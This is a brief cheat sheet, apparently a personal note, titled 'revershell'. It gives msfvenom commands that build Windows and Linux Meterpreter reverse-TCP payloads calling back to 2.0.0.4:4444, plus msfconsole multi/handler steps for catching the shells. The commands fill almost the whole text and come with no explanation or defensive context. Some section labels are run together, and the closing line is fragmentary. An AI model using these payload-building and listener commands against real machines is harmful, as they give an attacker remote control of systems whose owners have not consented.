revershell
For windows access from kali
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=2.0.0.4 LPORT=4444 -f exe -o payload.exe
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 2.0.0.4
set LPORT 4444
exploitFor linux access from kali
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=2.0.0.4 LPORT=4444 -f elf -o payload.elf
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 2.0.0.4
set LPORT 4444
exploitFor windows access from windows
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=2.0.0.4 LPORT=4444 -f exe -o payload.exe
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 2.0.0.4
set LPORT 4444
exploitmaking changes kali to windows machine next run the payload from windows machine making changes windows to kali machine
Last updated